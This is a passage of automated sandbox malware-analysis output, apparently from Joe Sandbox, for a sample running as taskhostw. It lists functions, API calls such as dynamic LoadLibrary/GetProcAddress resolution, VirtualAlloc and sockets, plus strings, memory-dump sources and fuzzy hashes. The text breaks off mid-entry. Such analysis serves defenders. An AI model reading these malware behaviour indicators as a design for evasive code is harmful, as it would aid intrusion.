Instruction Fuzzy Hash: 925122345053269FCF269F28C485BFABBA4EF69314F144056FC919B2E2C734AD56CB60

Function 02A656F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02A657A8
_memmove.LIBCMT ref: 02A65844
_memset.LIBCMT ref: 02A65868

Strings

ERCP, xrefs: 02A65713

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 3bfe1a7d75c87271183ee3d1dcb48fddc25b5d7ead3575e97d6e5534e268cb5e
Instruction ID: fc5e6cb53d0be707c6866193be8c39ced5a397fbb470bd678ff4e3d6cb88cfd9
Opcode Fuzzy Hash: 3bfe1a7d75c87271183ee3d1dcb48fddc25b5d7ead3575e97d6e5534e268cb5e
Instruction Fuzzy Hash: A0516A71D00709DBDB24CF65C9997AAB7E8FF04314F20856EE94ADB640EB74AA40CB94

Function 001C62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001C63A8
_memmove.LIBCMT ref: 001C6444
_memset.LIBCMT ref: 001C6468

Strings

ERCP, xrefs: 001C6313

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 42e57a39a2154a6a93de8923550ef53e33c9e9b0cd99ba16cc016e1eb5a06b42
Instruction ID: 4883dbb647ea538e96fcda6a6ec46c724b82067bafdc0bfbc83a44d7598d06b2
Opcode Fuzzy Hash: 42e57a39a2154a6a93de8923550ef53e33c9e9b0cd99ba16cc016e1eb5a06b42
Instruction Fuzzy Hash: C3519471910305DBDB28CF65C941BAAB7F5FF14714F20856EE94ACB281E771EA94CB40

Function 001D6CEE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 001D6D10
__calloc_crt.LIBCMT ref: 001D6D29

Strings

@B', xrefs: 001D6D40
&, xrefs: 001D6D4E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: __calloc_crt
String ID: &$@B'
API String ID: 3494438863-946825667
Opcode ID: b8f17ed9aa0b992396f61ed2aa764111cde3399229b97c659bdb3aa565271c33
Instruction ID: 2072d024d722d6ad684163c669cfce0f50bcba15ca516e13b4c45d141b0be9bc
Opcode Fuzzy Hash: b8f17ed9aa0b992396f61ed2aa764111cde3399229b97c659bdb3aa565271c33
Instruction Fuzzy Hash: DBF0C271708E228EF7288F99BC156A56796E751320B100427E588CE392E7B09CC04690

Function 02ADAA69 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02ADAA78
_memset.LIBCMT ref: 02ADAA87

Strings

oL, xrefs: 02ADAA72
doL, xrefs: 02ADAA81

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memset
String ID: oL$doL
API String ID: 2102423945-3421622115
Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
Instruction ID: f78658abb1b6714f82acfd47ba536c6927128d6dc8bc5df8c2e094cab434333e
Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
Instruction Fuzzy Hash: 9EF082B6640304BAF3506761BC15FBB3A5DEB08354F01C439BE09D91A1DB759C008BAC

Function 001B4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 001B4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,001B4C2E), ref: 001B4CB5

Strings

kernel32.dll, xrefs: 001B4C9E
GetNativeSystemInfo, xrefs: 001B4CAF

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 9f94e3a8fc79401242290f7fbc6f0abc0ed8066c9a8aadc8514cbb7d564320bb
Instruction ID: 05c96395149718c9cb3e5283bf4913beebb3b7bee730e6fa0b90bb0542d81fba
Opcode Fuzzy Hash: 9f94e3a8fc79401242290f7fbc6f0abc0ed8066c9a8aadc8514cbb7d564320bb
Instruction Fuzzy Hash: 95D012B0910727DFD7605F31FB18646B6E5AF06B55F11C839D8C5D6560D770D480C650

Function 001B4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 001B4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,002752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001B4D81

Strings

kernel32.dll, xrefs: 001B4D6A
Wow64DisableWow64FsRedirection, xrefs: 001B4D7B

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 60aabda7d26c9adc9f1e081f1814e18b123848efc6bcebe5a3c71dd06ee94a23
Instruction ID: c2b801dbb9f8348a0a76a163877eeff8b420c16af6bfbb4976ef5d4214204d70
Opcode Fuzzy Hash: 60aabda7d26c9adc9f1e081f1814e18b123848efc6bcebe5a3c71dd06ee94a23
Instruction Fuzzy Hash: 25D01270910713CFD7205F71F94C65676E9AF16351F11C93AD4CAD6260E770D480CA50

Function 001B4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 001B4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001B4DB4

Strings

kernel32.dll, xrefs: 001B4D9D
Wow64RevertWow64FsRedirection, xrefs: 001B4DAE

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: dfaae8005068b33b210570c9d6fe8e6c5b9a2f1bcea51638196c847efd7adc0b
Instruction ID: 5821cc11500b4deede09ab1c09da25bd1d2a2f3d487f4e76e42c773a425f0e7a
Opcode Fuzzy Hash: dfaae8005068b33b210570c9d6fe8e6c5b9a2f1bcea51638196c847efd7adc0b
Instruction Fuzzy Hash: F9D01770960723CFDB209F71F90CA86B6E5AF16355F11C83AD8CAD6160E770D880CA60

Function 00230E72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 00230E80
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00230E92

Strings

advapi32.dll, xrefs: 00230E7B
RegDeleteKeyExW, xrefs: 00230E8C

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 86f388a6b367434cd78e4ec1164c27c37eec96cdb25e64e85920208dc0219760
Instruction ID: ba90700d3955bdba7cc42702de7de47f71b8c145fb137fa955c63660fb12d532
Opcode Fuzzy Hash: 86f388a6b367434cd78e4ec1164c27c37eec96cdb25e64e85920208dc0219760
Instruction Fuzzy Hash: F6D012B0D20713CFD7205F35E95854776E8AF05351F518C39A4CAD2150DA74C4D0C661

Function 0022E13E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0022E1D2
CharLowerBuffW.USER32(?,?), ref: 0022E215

Part of subcall function 0022D8B9: CharLowerBuffW.USER32(?,?), ref: 0022D8D9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0022E415
_memmove.LIBCMT ref: 0022E428

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 8aad8f66d709c62035c5827c1ab9d085d4091ae2241657887057b7d37afac060
Instruction ID: 081a5eeb8a47437f03e426436f324cd3d723c7666aa5f3f2f96524884f578b70
Opcode Fuzzy Hash: 8aad8f66d709c62035c5827c1ab9d085d4091ae2241657887057b7d37afac060
Instruction Fuzzy Hash: D9C16A716183119FCB04DF68D480A6ABBE4FF89314F15896EF89A9B351D730E946CF82

Function 002281A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 002281D8
CoUninitialize.OLE32 ref: 002281E3

Part of subcall function 0020D87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 0020D8E3

VariantInit.OLEAUT32(?), ref: 002281EE
VariantClear.OLEAUT32(?), ref: 002284BF

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 14d110f92fa4552a94178b7b001a326d25ad646197cb32764909a692c7f61c21
Instruction ID: a5a9a75d9bb366b9b315db03a366cb15c1137779f54b11b8255f6310e52e1abf
Opcode Fuzzy Hash: 14d110f92fa4552a94178b7b001a326d25ad646197cb32764909a692c7f61c21
Instruction Fuzzy Hash: 20A15A35614712AFCB10EF64D481B5AB7E4BF98324F04844DFA9A9B3A2CB30ED15CB42

Function 02ABCD25 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 02ABCE9C
_wcscat.LIBCMT ref: 02ABCEB4
_wcscat.LIBCMT ref: 02ABCEC6

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscat$__wsplitpath
String ID:
API String ID: 1413645957-0
Opcode ID: 419868b450b4c3fed61ca736a3cba8fb66ed16f8ebe2498ea679e53552010edd
Instruction ID: e4ded6f0b5c769f80f9b64bf228a7cbae7445ce7faecdface1daea41984cd81e
Opcode Fuzzy Hash: 419868b450b4c3fed61ca736a3cba8fb66ed16f8ebe2498ea679e53552010edd
Instruction Fuzzy Hash: E3815F76504301DFCB25EF24C984EAAB7EAAF88364F18486FE885C7251EB34D944CF91

Function 00206BD3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00206BE4
SysAllocString.OLEAUT32(00000000), ref: 00206C8D
VariantCopy.OLEAUT32 ref: 00206CBC
VariantClear.OLEAUT32(?), ref: 00206CE3

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 7468645bec528243a6ba0bebfa5d10d145af6056dd3ff9e064b1a30d0a9f5097
Instruction ID: 8ed096679c9ca9fb03886919462b79a390b12e73aa03908bb264bc94590b8536
Opcode Fuzzy Hash: 7468645bec528243a6ba0bebfa5d10d145af6056dd3ff9e064b1a30d0a9f5097
Instruction Fuzzy Hash: 5151A6307343029FDB20AF65D899A69F7E5EF54310F20982FE596CB2D2DB7098B08B15

Function 02ABD0A6 Relevance: 6.2, APIs: 4, Instructions: 185COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 02ABD1E2
_wcscat.LIBCMT ref: 02ABD1FA
_wcscat.LIBCMT ref: 02ABD20C
_wcscpy.LIBCMT ref: 02ABD294

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscat$__wsplitpath_wcscpy
String ID:
API String ID: 3240238573-0
Opcode ID: c4be0d6d051c9a5586649a060292ef201f444436ff07de910742ac9b52897b5e
Instruction ID: 56a2cb570d125a37c6296cf99f16ec08135575eaf1baff4080cf77cd80b010ab
Opcode Fuzzy Hash: c4be0d6d051c9a5586649a060292ef201f444436ff07de910742ac9b52897b5e
Instruction Fuzzy Hash: D06167B25047459FCB10EF20C980A9FB3E9FF89314F04496EE98987251DB35E948CF92

Function 02AB92D4 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 02A57341: _memmove.LIBCMT ref: 02A57382

__swprintf.LIBCMT ref: 02AB9396
__swprintf.LIBCMT ref: 02AB93AF
_wprintf.LIBCMT ref: 02AB9465
_wprintf.LIBCMT ref: 02AB9483

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __swprintf_wprintf$_memmove
String ID:
API String ID: 2249476411-0
Opcode ID: 5fe8276651298b12dd02ed1421de06954d2c5027e08e5021fe268e399811912e
Instruction ID: 95a86361bbd410330f9c8b0bbfe34f903527de94e51b2bdaa19f8b031496b50d
Opcode Fuzzy Hash: 5fe8276651298b12dd02ed1421de06954d2c5027e08e5021fe268e399811912e
Instruction Fuzzy Hash: 98517271840519AADF15EBA0DE81EEFB77EAF14300F1001A5E915721A1EF316F98DF64

Function 02AB8A04 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 02A54445: _fseek.LIBCMT ref: 02A5445D

Part of subcall function 02AB8BDD: _wcscmp.LIBCMT ref: 02AB8CCD
Part of subcall function 02AB8BDD: _wcscmp.LIBCMT ref: 02AB8CE0

_free.LIBCMT ref: 02AB8B4B
_free.LIBCMT ref: 02AB8B52
_free.LIBCMT ref: 02AB8BBD
_free.LIBCMT ref: 02AB8BC5

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _free$_wcscmp$_fseek
String ID:
API String ID: 3404660211-0
Opcode ID: f56fa67e0b06d3e282f5813e55682b8b0f3bb457bdc1eb1ecdf5f6bc5c6e5ef9
Instruction ID: f349d1be486ed32aff4535f42e3cdcae4bc835b4c5a176bc756e698b33890567
Opcode Fuzzy Hash: f56fa67e0b06d3e282f5813e55682b8b0f3bb457bdc1eb1ecdf5f6bc5c6e5ef9
Instruction Fuzzy Hash: 34514DB1944268AFDF259F64CC84ADEBBBEEF48300F00449EE609A7241DB755A90CF58

Function 02AB90C2 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

APIs

Part of subcall function 02A57341: _memmove.LIBCMT ref: 02A57382

__swprintf.LIBCMT ref: 02AB9183
__swprintf.LIBCMT ref: 02AB919C
_wprintf.LIBCMT ref: 02AB9243
_wprintf.LIBCMT ref: 02AB9261

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __swprintf_wprintf$_memmove
String ID:
API String ID: 2249476411-0
Opcode ID: 1a87b35778fb241c9227f0f33b7aec30126c43843cecd2f26141487188273ef9
Instruction ID: ec40e1d20d5e2609610486361c1a667e44e868497593627cf7c701bb08758bc9
Opcode Fuzzy Hash: 1a87b35778fb241c9227f0f33b7aec30126c43843cecd2f26141487188273ef9
Instruction Fuzzy Hash: 2E517E71880619AADF15EBA0CE81EEFF77AAF14300F600165E905720A1EF352E99DF64

Function 02A73C7A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 02A73D10
__flush.LIBCMT ref: 02A73D30
__write.LIBCMT ref: 02A73D63
__flsbuf.LIBCMT ref: 02A73D91

Part of subcall function 02A780A8: __getptd_noexit.LIBCMT ref: 02A780A8

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 640e8c15ae52c3ad1599845e8d2a432b55e2b80ae749290df43cfa0727e9f0e5
Instruction ID: 0d13ca38fb207dfa1db85640e51a43c209b17516c22d70e054289944e5f658c3
Opcode Fuzzy Hash: 640e8c15ae52c3ad1599845e8d2a432b55e2b80ae749290df43cfa0727e9f0e5
Instruction Fuzzy Hash: FD419571700705AFDF288FA9CCC09AE7BB6AF44364B1689BDF805C7641DF709984AB48

Function 02A884B7 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 02A780A8: __getptd_noexit.LIBCMT ref: 02A780A8

__getbuf.LIBCMT ref: 02A88551
__write.LIBCMT ref: 02A8857F
__lseeki64.LIBCMT ref: 02A885C3
__write.LIBCMT ref: 02A885F2

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __write$__getbuf__getptd_noexit__lseeki64
String ID:
API String ID: 4182129353-0
Opcode ID: ef91125ff8c223d1a72b4a8ef83d5c35f483301ad284fd55d5e7f103683ae109
Instruction ID: 544899221d60816b2fa43b16f111e9c803c88e45ae37966ddbf1e572c963bc4b
Opcode Fuzzy Hash: ef91125ff8c223d1a72b4a8ef83d5c35f483301ad284fd55d5e7f103683ae109
Instruction Fuzzy Hash: 9C41E5B15007099FD738AF18C981A6A77E6AF41324F44862DE8A68B6D0EF38E9408F55

Function 00226AC0 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00226AE7
WSAGetLastError.WSOCK32(00000000), ref: 00226AF7

Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00226B5B
WSAGetLastError.WSOCK32(00000000), ref: 00226B67

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 1c44163ecdff459197ba9354874be241b7fe78ac9292175ec67038a84d959be4
Instruction ID: de4cb7a42cd384f90999040a8690420b9d207635705483bf24132c79d100ce81
Opcode Fuzzy Hash: 1c44163ecdff459197ba9354874be241b7fe78ac9292175ec67038a84d959be4
Instruction Fuzzy Hash: 6741B435740210AFEB10AF64DC8AF7A77E99B14B14F448058FA59AB2D2DB709C018751

Function 02ABE421 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 02ABE457
_wcscmp.LIBCMT ref: 02ABE46E
_wcscmp.LIBCMT ref: 02ABE500
_wcscmp.LIBCMT ref: 02ABE517

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 855258f68d994c25f8440a18dc4a842d1637f7687e67efe119223d49f839d205
Instruction ID: 9540318f31d0fb369cba18c8cc32b14e41382907268987612f9cc93c31a83f90
Opcode Fuzzy Hash: 855258f68d994c25f8440a18dc4a842d1637f7687e67efe119223d49f839d205
Instruction Fuzzy Hash: 9131E8325002196ADF21EFB4DD89BEE77AC9F49324F5405B9E804D3091EF35DA88CB68

Function 00226530 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

